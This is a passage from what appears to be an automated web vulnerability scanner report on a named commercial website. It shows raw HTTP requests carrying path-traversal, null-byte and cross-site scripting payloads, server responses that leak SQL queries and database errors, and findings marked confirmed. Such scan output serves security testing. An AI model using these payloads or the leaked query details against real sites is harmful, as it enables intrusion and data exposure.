Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9sj3d70vg3dbpkso5iiut7lqu0; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>' OR prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>' OR prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>' OR prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>' OR prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>' OR prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0004EF)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/

/ppc/leadflow/ CONFIRMED

http://www.insideup.com/ppc/leadflow/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x0004F6)</script>

Request

GET /ppc/leadflow/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004F6)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=4fk2qmcq53beqjoabeifsnm3e7; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>' OR prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>' OR prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>' OR prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>' OR prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>' OR prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0004F6)</script>/' union select prj.catI' at line 5
- /ppc/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000542)%3C/script%3E

/ppc/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000542)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000542)%3C/script%3E

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000542)</script>

Request

GET /ppc/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000542)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=takhlbbrch3l1oq05bjijkh6h3; path=/
Content-Length: 2793
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>' OR prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>' OR prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 